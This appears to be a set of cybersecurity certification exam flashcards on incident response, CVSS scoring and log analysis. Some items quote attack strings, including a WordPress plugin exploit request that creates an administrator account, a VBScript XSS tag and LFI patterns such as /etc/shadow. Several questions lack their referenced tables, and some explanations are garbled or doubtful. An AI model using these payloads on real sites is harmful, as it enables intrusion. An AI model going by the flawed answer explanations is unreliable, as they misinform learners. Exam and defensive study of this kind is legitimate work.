During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner and the server was up to date and configured with appropriate auditing and logging. The Chief Information Security Officer wants to find out precisely what happened. Which of the following actions should the analyst take first?

A. Clone the virtual server for forensic analysis.
B. Log into the affected server and begin analysis of the logs.
C. Restore from the last known-good backup to confirm there was no loss of connectivity.
D. Shut down the affected server immediately.

A

A. Clone the virtual server for forensic analysis.

Cloning the virtual server allows the analyst to capture a snapshot of the system as it is, including all current data, configurations, and state. This cloned version can be analyzed in detail without affecting the integrity of the original server, which is crucial for any potential legal proceedings and for understanding the scope and details of the attack.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
56
Q

A systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular outgoing HTTPS connections from one of the servers to a public IP address. The server should not be making outgoing connections after hours. Looking closer, the administrator sees this traffic pattern around the clock during work hours as well. Which of the following is the most likely explanation?

A. C2 beaconing activity.
B. Data exfiltration.
C. Anomalous activity on unexpected ports.
D. Network host IP address scanning.
E. A rogue network device.

A

A. C2 beaconing activity.

The most likely explanation for this traffic pattern is C2 beaconing activity. C2 stands for command and control, which is a phase of the Cyber Kill Chain that involves the adversary attempting to establish communication with a successfully exploited target. C2 beaconing activity is a type of network traffic that indicates a compromised system is sending periodic messages or signals to an attacker’s system using various protocols, such as HTTP(S), DNS, ICMP, or UDP. C2 beaconing activity can enable the attacker to remotely control or manipulate the target system or network using various methods, such as malware callbacks, backdoors, botnets, or covert channels.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
57
Q

New employees in an organization have been consistently plugging in personal webcams despite the company policy prohibiting use of personal devices. The SOC manager discovers that new employees are not aware of the company policy. Which of the following will the SOC manager most likely recommend to help ensure new employees are accountable for following the company policy?

A. Human resources must email a copy of a user agreement to all new employees.
B. Supervisors must get verbal confirmation from new employees indicating they have read the user agreement.
C. All new employees must take a test about the company security policy during the onboardmg process.
D. All new employees must sign a user agreement to acknowledge the company security policy.

A

D. All new employees must sign a user agreement to acknowledge the company security policy.

Requiring new employees to sign a user agreement is a common and effective practice in organizations. It ensures that employees have acknowledged and agreed to adhere to the company’s security policies, including the prohibition of personal devices.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
58
Q

An analyst has been asked to validate the potential risk of a new ransomware campaign that the Chief Financial Officer read about in the newspaper. The company is a manufacturer of a very small spring used in the newest fighter jet and is a critical piece of the supply chain for this aircraft. Which of the following would be the best threat intelligence source to learn about this new campaign?

A. Information sharing organization.
B. Blogs/forums.
C. Cybersecurity incident response team.
D. Deep/dark web.

A

A. Information sharing organization.

Information Sharing and Analysis Centers (ISACs) or other similar organizations are dedicated to sharing information about threats and vulnerabilities in specific sectors, including critical infrastructure and defense. Given the company’s role in the supply chain for a fighter jet, it would likely be a part of an industry-specific ISAC focused on defense or critical infrastructure. These organizations often have access to high-quality, vetted intelligence, including classified or sensitive information that may not be available through other channels. They also enable timely and relevant information sharing among members.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
59
Q

An incident response team finished responding to a significant security incident. The management team has asked the lead analyst to provide an after-action report that includes lessons learned. Which of the following is the most likely reason to include lessons learned?

A. To satisfy regulatory requirements for incident reporting.
B. To hold other departments accountable.
C. To identify areas of improvement in the incident response process.
D. To highlight the notable practices of the organization’s incident response team.

A

C. To identify areas of improvement in the incident response process.

Lessons learned are a critical component of the incident response process. They serve the purpose of reflecting on what went well and what could have been done better during the incident response.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
60
Q

A vulnerability management team is unable to patch all vulnerabilities found during their weekly scans. Using the third-party scoring system described below, the team patches the most urgent vulnerabilities:

Additionally, the vulnerability management team feels that the metrics Smear and Channing are less important than the others, so these will be lower in priority. Which of the following vulnerabilities should be patched first, given the above third-party scoring system?

A. InLoud:
Cobain: Yes -
Grohl: No -
Novo: Yes -
Smear: Yes -
Channing: No

B. TSpirit:
Cobain: Yes -
Grohl: Yes -
Novo: Yes -
Smear: No -
Channing: No

C. ENameless:
Cobain: Yes -
Grohl: No -
Novo: Yes -
Smear: No -
Channing: No

D. PBleach:
Cobain: Yes -
Grohl: No -
Novo: No -
Smear: No -
Channing: Yes

A

B. TSpirit:

Cobain: Yes -
Grohl: Yes -
Novo: Yes -
Smear: No -
Channing: No

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
61
Q

A user downloads software that contains malware onto a computer that eventually infects numerous other systems. Which of the following has the user become?

A. Hacktivist.
B. Advanced persistent threat.
C. Insider threat.
D. Script kiddie.

A

C. Insider threat.

An insider threat refers to a person within an organization (in this case, the user) who poses a threat to the organization’s security. Insider threats can be unintentional, such as when a user unknowingly downloads and spreads malware.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
62
Q

An organization has activated the CSIRT. A security analyst believes a single virtual server was compromised and immediately isolated from the network. Which of the following should the CSIRT conduct next?

A. Take a snapshot of the compromised server and verify its integrity.
B. Restore the affected server to remove any malware.
C. Contact the appropriate government agency to investigate.
D. Research the malware strain to perform attribution.

A

A. Take a snapshot of the compromised server and verify its integrity.

The next action that the CSIRT should conduct after isolating the compromised server from the network
is to take a snapshot of the compromised server and verify its integrity. Taking a snapshot and verifying its integrity can help preserve and protect any evidence or information related to the incident, as well as prevent any tampering, contamination, or destruction of evidence.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
63
Q

During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related to its volatility level?

A. Disk contents
B. Backup data
C. Temporary files
D. Running processes

A

D. Running processes

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
64
Q

A security analyst is trying to identify possible network addresses from different source networks belonging to the same company and region. Which of the following shell script functions could help achieve the goal?

A. function w() { a=$(ping -c 1 $1 | awk-F ”/” ’END{print $1}’) && echo “$1 | $a” }

B. function x() { b=traceroute -m 40 $1 | awk ’END{print $1}’) && echo “$1 | $b” }

C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ”.in-addr” ’{print $1}’).origin.asn.cymru.com TXT +short }

D. function z() { c=$(geoiplookup$1) && echo “$1 | $c” }

A

C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ”.in-addr” ’{print $1}’).origin.asn.cymru.com TXT +short }

This function takes an IP address as an argument and performs two DNS lookups using the dig command. The first lookup uses the -x option to perform a reverse DNS lookup and get the hostname associated with the IP address. The second lookup uses the origin.asn.cymru.com domain to get the autonomous system number (ASN) and other information related to the IP address, such as the country code, registry, or allocation date. The function then prints the IP address and the ASN information, which can help identify any network addresses that belong to the same ASN or region.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
65
Q

A security analyst is writing a shell script to identify IP addresses from the same country. Which of the following functions would help the analyst achieve the objective?

A. function w() { info=$(ping -c 1 $1 | awk -F “/” ‘END{print $1}’) && echo “$1 | $info” }

B. function x() { info=$(geoiplookup $1) && echo “$1 | $info” }

C. function y() { info=$(dig -x $1 | grep PTR | tail -n 1 ) && echo “$1 | $info” }

D. function z() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo “$1 | $info” }

A

B. function x() { info=$(geoiplookup $1) && echo “$1 | $info” }

This function takes an IP address as an argument and uses the geoiplookup command to get the geographic location information associated with the IP address, such as the country name, country code, region, city, or latitude and longitude. The function then prints the IP address and the geographic location information, which can help identify any IP addresses that belong to the same country.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
66
Q

A security analyst obtained the following table of results from a recent vulnerability assessment that was conducted against a single web server in the environment:

Which of the following should be completed first to remediate the findings?

A. Ask the web development team to update the page contents.
B. Add the IP address allow listing for control panel access.
C. Purchase an appropriate certificate from a trusted root CA.
D. Perform proper sanitization on all fields.

A

D. Perform proper sanitization on all fields.

The first action that should be completed to remediate the findings is to perform proper sanitization on all fields. Performing proper sanitization on all fields can help address the most critical and common vulnerability found during the vulnerability assessment.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
67
Q

While reviewing web server logs, an analyst notices several entries with the same time stamps, but all contain odd characters in the request line. Which of the following steps should be taken next?

A. Shut the network down immediately and call the next person in the chain of command.
B. Determine what attack the odd characters are indicative of.
C. Utilize the correct attack framework and determine what the incident response will consist of.
D. Notify the local law enforcement for incident response.

A

B. Determine what attack the odd characters are indicative of.

In the context of reviewing web server logs, the most immediate and practical step is to investigate the nature of the odd characters in the request line. This involves understanding the patterns, syntax, and characteristics of these entries to determine if they are indicative of a particular attack or anomaly.

Simply shutting down the network (option A) or notifying law enforcement (option D) without understanding the nature of the issue might be premature and could disrupt normal operations unnecessarily. Utilizing the correct attack framework (option C) may come into play after identifying the attack type, but the initial focus should be on understanding the nature of the odd characters to assess the potential threat.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
68
Q

A security team conducts a lessons-learned meeting after struggling to determine who should conduct the next steps following a security event. Which of the following should the team create to address this issue?

A. Service-level agreement.
B. Change management plan.
C. Incident response plan.
D. Memorandum of understanding.

A

C. Incident response plan.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
69
Q

A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with. Which of the following is the best mitigation technique?

A. Geoblock the offending source country.
B. Block the IP range of the scans at the network firewall.
C. Perform a historical trend analysis and look for similar scanning activity.
D. Block the specific IP address of the scans at the network firewall.

A

B. Block the IP range of the scans at the network firewall.

Option A, geo-blocking the offending country of origin, is not the best choice due to the negative impact, the possibility of evasion and the overly broad approach. Option B, blocking the IP range from scans at the network firewall, is the most appropriate as it is straightforward, effective, flexible, and strikes a better balance in addressing the specific issue without harming legitimate traffic. Therefore, the answer is B. In summary, option B is the most effective and balanced choice to mitigate the threat of network scanning activities originating from a country with which the company does not do business.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
70
Q

An analyst has received an IPS event notification from the SIEM stating an IP address, which is known to be malicious and has attempted to exploit a zero-day vulnerability on several web servers. The exploit contained the following snippet:

/wp-json/trx_addons/V2/get/sc_layout?sc=wp_insert_user&role=administrator

Which of the following controls would work best to mitigate the attack represented by this snippet?

A. Limit user creation to administrators only.
B. Limit layout creation to administrators only.
C. Set the directory trx_addons to read only for all users.
D. Set the directory V2 to read only for all users.

A

A. Limit user creation to administrators only.

71
Q

A penetration tester submitted data to a form in a web application, which enabled the penetration tester to retrieve user credentials. Which of the following should be recommended for remediation of this application vulnerability?

A. Implementing multifactor authentication on the server OS.
B. Hashing user passwords on the web application.
C. Performing input validation before allowing submission.
D. Segmenting the network between the users and the web server.

A

C. Performing input validation before allowing submission.

72
Q

A cybersecurity team lead is developing metrics to present in the weekly executive briefs. Executives are interested in knowing how long it takes to stop the spread of malware that enters the network. Which of the following metrics should the team lead include in the briefs?

A. Mean time between failures.
B. Mean time to detect.
C. Mean time to remediate.
D. Mean time to contain.

A

D. Mean time to contain.

Mean time to contain is the metric that the cybersecurity team lead should include in the weekly executive briefs, as it measures how long it takes to stop the spread of malware that enters the network. Mean time to contain is the average time it takes to isolate and neutralize an incident or a threat, such as malware, from the time it is detected. Mean time to contain is an important metric for evaluating the effectiveness and efficiency of the incident response process, as well as the potential impact and damage of the incident or threat. A lower mean time to contain indicates a faster and more successful response, which can reduce the risk and cost of the incident or threat. Mean time to contain can also be compared with other metrics, such as mean time to detect or mean time to remediate, to identify gaps or areas for improvement in the incident response process.

73
Q

An employee accessed a website that caused a device to become infected with invasive malware. The incident response analyst has:

  • created the initial evidence log.
  • disabled the wireless adapter on the device.
  • interviewed the employee, who was unable to identify the website that was accessed.
  • reviewed the web proxy traffic logs.

Which of the following should the analyst do to remediate the infected device?

A. Update the system firmware and reimage the hardware.
B. Install an additional malware scanner that will send email alerts to the analyst.
C. Configure the system to use a proxy server for Internet access.
D. Delete the user profile and restore data from backup.

A

A. Update the system firmware and reimage the hardware.

74
Q

A cloud team received an alert that unauthorized resources were being auto-provisioned. After investigating, the team suspects that cryptomining is occurring. Which of the following indicators would most likely lead the team to this conclusion?

A. High GPU utilization.
B. Bandwidth consumption.
C. Unauthorized changes.
D. Unusual traffic spikes.

A

A. High GPU utilization.

74
Q

A company’s security team is updating a section of the reporting policy that pertains to inappropriate use of resources (e.g., an employee who installs cryptominers on workstations in the office). Besides the security team, which of the following groups should the issue be escalated to first, in order to comply with industry best practices?

A. Help desk.
B. Law enforcement.
C. Legal department.
D. Board member.

A

C. Legal department.

75
Q

Given the following CVSS string:

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Which of the following attributes correctly describes this vulnerability?

A. A user is required to exploit this vulnerability.
B. The vulnerability is network based.
C. The vulnerability does not affect confidentiality.
D. The complexity to exploit the vulnerability is high.

A

B. The vulnerability is network based.

AV:N: vulnerability is network-based
AC:L: attack complexity is low
PR:N: privileges are not required to exploit the vulnerability
UI:N: no user interaction required
S:U: scope of the impact is unchanged (unchanged scope).
C:H: confidentiality impact is high.
I:H: integrity impact is high.
A:H: availability impact is high.

76
Q

A cryptocurrency service company is primarily concerned with ensuring the accuracy of the data on one of its systems. A security analyst has been tasked with prioritizing vulnerabilities for remediation for the system. The analyst will use the following CVSSv3.1 impact metrics for prioritization:

Which of the following vulnerabilities should be prioritized for remediation?

A. 1
B. 2
C. 3
D. 4

A

D. 4

Question states the “company is primarily concerned with ensuring the accuracy of the data”, or integrity in other words. Preserving the integrity of the data is important. So we will prioritize vulnerabilities that affect integrity (I in the CVSS 3.1 metrics)

V1 - I:L means integrity risk is low
V2 - I:L means integrity risk is low
V3 - I:N means integrity risk is none
V4 - I:H means integrity risk is high

77
Q

Patches for two highly exploited vulnerabilities were released on the same Friday afternoon. Information about the systems and vulnerabilities is shown in the tables below:

Which of the following should the security analyst prioritize for remediation?

A. rogers
B. brady
C. brees
D. manning

A

B. brady

78
Q

A security analyst must preserve a system hard drive that was involved in a litigation request. Which of the following is the best method to ensure the data on the device is not modified?

A. Generate a hash value and make a backup image.
B. Encrypt the device to ensure confidentiality of the data.
C. Protect the device with a complex password.
D. Perform a memory scan dump to collect residual data

A

A. Generate a hash value and make a backup image.

79
Q

Which of the following best describes the goal of a tabletop exercise?

A. To test possible incident scenarios and how to react properly.
B. To perform attack exercises to check response effectiveness.
C. To understand existing threat actors and how to replicate their techniques.
D. To check the effectiveness of the business continuity plan.

A

A. To test possible incident scenarios and how to react properly.

A tabletop exercise is a type of simulation exercise that involves testing possible incident scenarios and how to react properly, without actually performing any actions or using any resources. A tabletop exercise is usually conducted by a facilitator who presents a realistic scenario to a group of participants, such as a cyberattack, a natural disaster, or a data breach. The participants then discuss and evaluate their roles, responsibilities, plans, procedures, and policies for responding to the incident, as well as the potential impacts and outcomes. A tabletop exercise can help identify strengths and weaknesses in the incident response plan, improve communication and coordination among the stakeholders, raise awareness and preparedness for potential incidents, and provide feedback and recommendations for improvement.

80
Q

A virtual web server in a server pool was infected with malware after an analyst used the internet to research a system issue. After the server was rebuilt and added back into the server pool, users reported issues with the website, indicating the site could not be trusted.

Which of the following is the most likely cause of the server issue?

A. The server was configured to use SSL to securely transmit data.
B. The server was supporting weak TLS protocols for client connections.
C. The malware infected all the web servers in the pool.
D. The digital certificate on the web server was self-signed.

A

D. The digital certificate on the web server was self-signed.

A digital certificate is a document that contains the public key and identity information of a web server, and is signed by a trusted third-party authority called a certificate authority (CA). A digital certificate allows the web server to establish a secure connection with the clients using the HTTPS protocol, and also verifies the authenticity of the web server. A self-signed certificate is a digital certificate that is not signed by a CA, but by the web server itself. A self-signed certificate can cause issues with the website, as it may not be trusted by the clients or their browsers. Clients may receive warnings or errors when trying to access the website,
indicating that the site could not be trusted or that the connection is not secure.

81
Q

A zero-day command injection vulnerability was published. A security administrator is analyzing the following logs for evidence of adversaries attempting to exploit the vulnerability:

Which of the following log entries provides evidence of the attempted exploit?

A. Log entry 1
B. Log entry 2
C. Log entry 3
D. Log entry 4

A

A. Log entry 1

This entry appears to contain a command injection attempt in the URL using Java’s Runtime class.

82
Q

A security analyst needs to ensure that systems across the organization are protected based on the sensitivity of the content each system hosts. The analyst is working with the respective system owners to help determine the best methodology that seeks to promote confidentiality, availability, and integrity of the data being hosted.

Which of the following should the security analyst perform first to categorize and prioritize the respective systems?

A. Interview the users who access these systems.
B. Scan the systems to see which vulnerabilities currently exist.
C. Configure alerts for vendor-specific zero-day exploits.
D. Determine the asset value of each system.

A

D. Determine the asset value of each system.

83
Q

A security analyst is reviewing the following alert that was triggered by FIM on a critical system:

Which of the following best describes the suspicious activity that is occurring?

A. A fake antivirus program was installed by the user.
B. A network drive was added to allow exfiltration of data.
C. A new program has been set to execute on system start.
D. The host firewall on 192.168.1.10 was disabled.

A

C. A new program has been set to execute on system start.

84
Q

A technician is analyzing output from a popular network mapping tool for a PCI audit:

Which of the following best describes the output?

A. The host is not up or responding.
B. The host is running excessive cipher suites.
C. The host is allowing insecure cipher suites.
D. The Secure Shell port on this host is closed.

A

C. The host is allowing insecure cipher suites.

The output shows the result of running the ssl-enum-ciphers script with Nmap, which is a tool that can scan web servers for supported SSL/TLS cipher suites. Cipher suites are combinations of cryptographic algorithms that are used to establish secure communication between a client and a server. The output shows the cipher suites that are supported by the server, along with a letter grade (A through F) indicating the strength of the connection. The output also shows the least strength, which is the strength of the weakest cipher offered by the server. In this case, the least strength is F, which means that the server is allowing insecure cipher suites that are vulnerable to attacks or have been deprecated. For example, the output shows that the server supports SSLv3, which is an outdated and insecure protocol that is susceptible to the POODLE attack. The output also shows that the server supports RC4, which is a weak and broken stream cipher that should not be used. Therefore, the best description of the output is that the host is allowing insecure cipher suites. The other descriptions are not accurate, as they do not reflect what the output shows. The host is not up or responding is incorrect, as the output clearly shows that the host is up and responding to the scan. The host is running excessive cipher suites is incorrect, as the output does not indicate how many cipher suites the host is running, only which ones it supports. The Secure Shell port on this host is closed is incorrect, as the output does not show anything about port 22, which is the default port for Secure Shell (SSH). The output only shows information about port 443, which is the default port for HTTPS.

85
Q

An employee accessed a website that caused a device to become infected with invasive malware. The incident response analyst has:

  • created the initial evidence log.
  • disabled the wireless adapter on the device.
  • interviewed the employee, who was unable to identify the website that was accessed.
  • reviewed the web proxy traffic logs.

Which of the following should the analyst do to remediate the infected device?

A. Update the system firmware and reimage the hardware.
B. Install an additional malware scanner that will send email alerts to the analyst.
C. Configure the system to use a proxy server for Internet access.
D. Delete the user profile and restore data from backup.

A

A. Update the system firmware and reimage the hardware.

Updating the system firmware and reimaging the hardware is the best action to perform to remediate the infected device, as it helps to ensure that the device is restored to a clean and secure state and that any traces of malware are removed.

86
Q

A security analyst discovers an LFI vulnerability that can be exploited to extract credentials from the underlying host. Which of the following patterns can the security analyst use to search the web server logs for evidence of exploitation of that particular vulnerability?

A. /etc/shadow
B. curl localhost
C. ; printenv
D. cat /proc/self/

A

A. /etc/shadow

/etc/shadow is the pattern that the security analyst can use to search the web server logs for evidence of exploitation of the LFI vulnerability that can be exploited to extract credentials from the underlying host. LFI stands for Local File Inclusion, which is a vulnerability that allows an attacker to include local files on the web server into the output of a web application. LFI can be exploited to extract sensitive information from the web server, such as configuration files, passwords, or source code. The /etc/shadow file is a file that stores the encrypted passwords of all users on a Linux system. If an attacker can exploit the LFI vulnerability to include this file into the web application output, they can obtain the credentials of the users on the web server. Therefore, the security analyst can look for /etc/shadow in the request line of the web server logs to see if any attacker has attempted or succeeded in exploiting the LFI vulnerability.

87
Q

While reviewing web server logs, a security analyst found the following line:

<IMG SRC=’vbscript:msgbox(“test”)’>

Which of the following malicious activities was attempted?

A. Command injection
B. XML injection
C. Server-side request forgery
D. Cross-site scripting

A

D. Cross-site scripting

XSS is a type of web application attack that exploits the vulnerability of a web server or browser to execute malicious scripts or commands on the client-side. XSS attackers inject malicious code, such as JavaScript, VBScript, HTML, or CSS, into a web page or application that is viewed by other users. The malicious code can then access or manipulate the user’s session, cookies, browser history, or personal information, or perform actions on behalf of the user, such as stealing credentials, redirecting to phishing sites, or installing malware12
The line in the web server log shows an example of an XSS attack using VBScript. The attacker tried to insert an <img></img> tag with a malicious SRC attribute that contains a VBScript code. The VBScript code is intended to display a message box with the text “test” when the user views the web page or application. This is a simple and harmless example of XSS, but it could be used to test the vulnerability of the web server or browser, or to launch more sophisticated and harmful attacks.

88
Q

An incident response team is working with law enforcement to investigate an active web server compromise. The decision has been made to keep the server running and to implement compensating controls for a period of time. The web service must be accessible from the internet via the reverse proxy and must connect to a database server. Which of the following compensating controls will help contain the adversary while meeting the other requirements? (Select two)

A. Drop the tables on the database server to prevent data exfiltration.
B. Deploy EDR on the web server and the database server to reduce the adversaries capabilities.
C. Stop the httpd service on the web server so that the adversary can not use web exploits
D. Use micro segmentation to restrict connectivity to/from the web and database servers.
E. Comment out the HTTP account in the / etc/passwd file of the web server
F. Move the database from the database server to the web server.

A

B. Deploy EDR on the web server and the database server to reduce the adversaries capabilities.
D. Use micro segmentation to restrict connectivity to/from the web and database servers.

Deploying EDR on the web server and the database server to reduce the adversaries capabilities and using micro segmentation to restrict connectivity to/from the web and database servers are two compensating controls that will help contain the adversary while meeting the other requirements. A compensating control is a security measure that is implemented to mitigate the risk of a vulnerability or an attack when the primary control is not feasible or effective. EDR stands for Endpoint Detection and Response, which is a tool that monitors endpoints for malicious activity and provides automated or manual response capabilities. EDR can help contain the adversary by detecting and blocking their actions, such as data exfiltration, lateral movement, privilege escalation, or command execution. Micro segmentation is a technique that divides a network into smaller segments based on policies and rules, and applies granular access controls to each segment. Micro segmentation can help contain the adversary by isolating the web and database servers from other parts of the network, and limiting the traffic that can flow between them.

89
Q

Which of the following best describes the document that defines the expectation to network customers that patching will only occur between 2:00 a.m. and 4:00 a.m.?

A. SLA
B. LOI
C. MOU
D. KPI

A

A. SLA

SLA (Service Level Agreement) is the best term to describe the document that defines the expectation to network customers that patching will only occur between 2:00 a.m. and 4:00 a.m., as it reflects the agreement between a service provider and a customer that specifies the services, quality, availability, and responsibilities that are agreed upon.

An SLA is a common type of document that is used in various industries and contexts, such as IT, telecom, cloud computing, or outsourcing. An SLA typically includes metrics and indicators to measure the performance and quality of the service, such as uptime, response time, or resolution time. An SLA also defines the consequences or remedies for any breaches or failures of the service, such as penalties, refunds, or credits. An SLA can help to manage customer expectations, formalize communication, improve productivity, and strengthen relationships. The other terms are not as accurate as SLA, as they describe different types of documents or concepts.

LOI (Letter of Intent) is a document that outlines the main terms and conditions of a proposed agreement between two or more parties, before a formal contract is signed. An LOI is usually non-binding and expresses the intention or interest of the parties to enter into a future agreement. An LOI can help to clarify the key points of a deal, facilitate negotiations, or demonstrate commitment.

MOU (Memorandum of Understanding) is a document that describes a mutual agreement or cooperation between two or more parties, without creating any legal obligations or commitments. An MOU is
usually more formal than an LOI, but less formal than a contract. An MOU can help to establish a common ground, define roles and responsibilities, or outline expectations and goals.

KPI (Key Performance Indicator) is a concept that refers to a measurable value that demonstrates how effectively an organization or individual is achieving its key objectives or goals. A KPI is usually quantifiable and specific, such as revenue growth, customer satisfaction, or employee retention. A KPI can help to track progress, evaluate performance, or identify areas for improvement.

90
Q

A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data. Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results?

A. Credentialed network scanning
B. Passive scanning
C. Agent-based scanning
D. Dynamic scanning

A

C. Agent-based scanning

Agent-based scanning is a method that involves installing software agents on the target systems or networks that can perform local scans and report the results to a central server or console.

Agent-based scanning can reduce the access to systems, as the agents do not require any credentials or permissions to scan the local system or network.

Agent-based scanning can also provide the most accurate vulnerability scan results, as the agents can scan continuously or on-demand, regardless of the system or network status or location.

91
Q

A security audit for unsecured network services was conducted, and the following output was generated:

Which of the following services should the security team investigate further? (Select two):

A. 21
B. 22
C. 23
D. 636
E. 1723
F. 3389

A

C. 23
D. 636

The output shows the results of a port scan, which is a technique used to identify open ports and services running on a network host. Port scanning can be used by attackers to discover potential vulnerabilities and exploit them, or by defenders to assess the security posture and configuration of their network devices. The output lists six ports that are open on the target host, along with the service name and version associated with each port. The service name indicates the type of application or protocol that is using the port, while the version indicates the specific release or update of the service. The service name and version can provide useful information for both attackers and defenders, as they can reveal the capabilities, features, and weaknesses of the service.

Among the six ports listed, two are particularly risky and should be investigated further by the security team: port 23 and port 636.

Port 23 is used by Telnet, which is an old and insecure protocol for remote login and command execution. Telnet does not encrypt any data transmitted over the network, including usernames and passwords, which makes it vulnerable to eavesdropping, interception, and modification by attackers. Telnet also has many known vulnerabilities that can allow attackers to gain unauthorized access, execute arbitrary commands, or cause denial-of-service attacks on the target host.

Port 636 is used by LDAP over SSL/TLS (LDAPS), which is a protocol for accessing and modifying directory services over a secure connection. LDAPS encrypts the data exchanged between the client and the server using SSL/TLS certificates, which provide authentication, confidentiality, and integrity. However, LDAPS can also be vulnerable to attacks if the certificates are not properly configured, verified, or updated. For example, attackers can use self-signed or expired certificates to perform man-in-the-middle attacks, spoofing attacks, or certificate revocation attacks on LDAPS connections. Therefore, the security team should investigate further why port 23 and port 636 are open on the target host, and what services are running on them. The security team should also consider disabling or replacing these services with more secure alternatives, such as SSH for port 23 and StartTLS for port 6362.

92
Q

A Chief Information Security Officer (CISO) is concerned that a specific threat actor, who is known to target the company’s business type, may be able to breach the network and remain inside of it for an extended period of time. Which of the following techniques should be performed to meet the CISO’s goals?

A. Vulnerability scanning
B. Adversary emulation
C. Passive discovery
D. Bug bounty

A

B. Adversary emulation

Adversary emulation is a technique that involves mimicking the tactics, techniques, and procedures (TTPs) of a specific threat actor or group to test the effectiveness of the security controls and incident response capabilities of an organization.

Adversary emulation can help identify and address the gaps and weaknesses in the security posture of an organization, as well as improve the readiness and skills of the security team.

Adversary emulation can also help measure the dwell time, which is the duration that a threat actor remains undetected inside the network. The other options are not the best techniques to meet the CISO’s goals.

Vulnerability scanning (A) is a technique that involves scanning the network and systems for known vulnerabilities, but it does not simulate a real attack or test the incident response capabilities.

Passive discovery (C) is a technique that involves collecting information about the network and systems without sending any packets or probes, but it does not identify or exploit any vulnerabilities or test the security controls.

Bug bounty (D) is a program that involves rewarding external researchers or hackers for finding and reporting vulnerabilities in an organization’s systems or applications, but it does not focus on a specific threat actor or group.

93
Q

A security analyst performs a vulnerability scan. Based on the metrics from the scan results, the analyst must prioritize which hosts to patch. The analyst runs the tool and receives the following output:

Which of the following hosts should be patched first, based on the metrics?

A. host01
B. host02
C. host03
D. host04

A

C. host03

Host03 should be patched first, based on the metrics, as it has the highest risk score and the highest number of critical vulnerabilities. The risk score is calculated by multiplying the CVSS score by the exposure factor, which is the percentage of systems that are vulnerable to the exploit. Host03 has a risk score of 10 x 0.9 = 9, which is higher than any other host. Host03 also has 5 critical vulnerabilities, which are the most severe and urgent to fix, as they can allow remote code execution, privilege escalation, or data loss. The other hosts have lower risk scores and lower numbers of critical vulnerabilities, so they can be patched later.

94
Q

A security analyst is trying to identify possible network addresses from different source networks belonging to the same company and region. Which of the following shell script functions could help achieve the goal?

**A. **function w() { a=$(ping -c 1 $1 | awk-F ”/” ’END{print $1}’) && echo “$1 | $a” }

B. function x() { b=traceroute -m 40 $1 | awk ’END{print $1}’) && echo “$1 | $b” }

C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ”.in-addr” ’{print $1}’).origin.asn.cymru.com TXT +short }

D. function z() { c=$(geoiplookup$1) && echo “$1 | $c” }

A

C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ”.in-addr” ’{print $1}’).origin.asn.cymru.com TXT +short }

The shell script function that could help identify possible network addresses from different source networks belonging to the same company and region is:

function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ”.in-addr” ’{print $1}’).origin.asn.cymru.com TXT +short }

This function takes an IP address as an argument and performs two DNS lookups using the dig command. The first lookup uses the -x option to perform a reverse DNS lookup and get the hostname associated with the IP address. The second lookup uses the origin.asn.cymru.com domain to get the autonomous system number (ASN) and other information related to the IP address, such as the country code, registry, or allocation date. The function then prints the IP address and the ASN information, which can help identify any network addresses that belong to the same ASN or region.

95
Q

Given the following CVSS string- CVSS:3.0/AV:N/AC:L/PR:N/UI:N/3:U/C:K/I:K/A:H
Which of the following attributes correctly describes this vulnerability?

A. A user is required to exploit this vulnerability.
B. The vulnerability is network based.
C. The vulnerability does not affect confidentiality.
D. The complexity to exploit the vulnerability is high.

A

B. The vulnerability is network based.

The vulnerability is network based is the correct attribute that describes this vulnerability, as it can be inferred from the CVSS string. CVSS stands for Common Vulnerability Scoring System, which is a framework that assigns numerical scores and ratings to vulnerabilities based on their characteristics and severity.

The CVSS string consists of several metrics that define different aspects of the vulnerability, such as the attack vector, the attack complexity, the privileges required, the user interaction, the scope, and the impact on confidentiality, integrity and availability. The first metric in the CVSS string is the attack vector (AV), which
indicates how the vulnerability can be exploited. The value of AV in this case is N, which stands for network. This means that the vulnerability can be exploited remotely over a network connection, without physical or logical access to the target system. Therefore, the vulnerability is network based.

96
Q

After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security Officer (CISO) decided the risk score would be too high. The CISO refused the software request. Which of the following risk management principles did the CISO select?

A. Avoid
B. Transfer
C. Accept
D. Mitigate

A

A. Avoid

Avoid is a risk management principle that describes the decision or action of not engaging in an activity or accepting a risk that is deemed too high or unacceptable. Avoiding a risk can eliminate the possibility or impact of the risk, as well as the need for any further risk management actions. In this case, the CISO decided the risk score would be too high and refused the software request. This indicates that the CISO selected the avoid principle for risk management.

97
Q

An employee is suspected of misusing a company-issued laptop. The employee has been suspended pending an investigation by human resources. Which of the following is the best step to preserve evidence?

A. Disable the user’s network account and access to web resources.
B. Make a copy of the files as a backup on the server.
C. Place a legal hold on the device and the user’s network share.
D. Make a forensic image of the device and create a SHA1 hash.

A

D. Make a forensic image of the device and create a SHA1 hash.

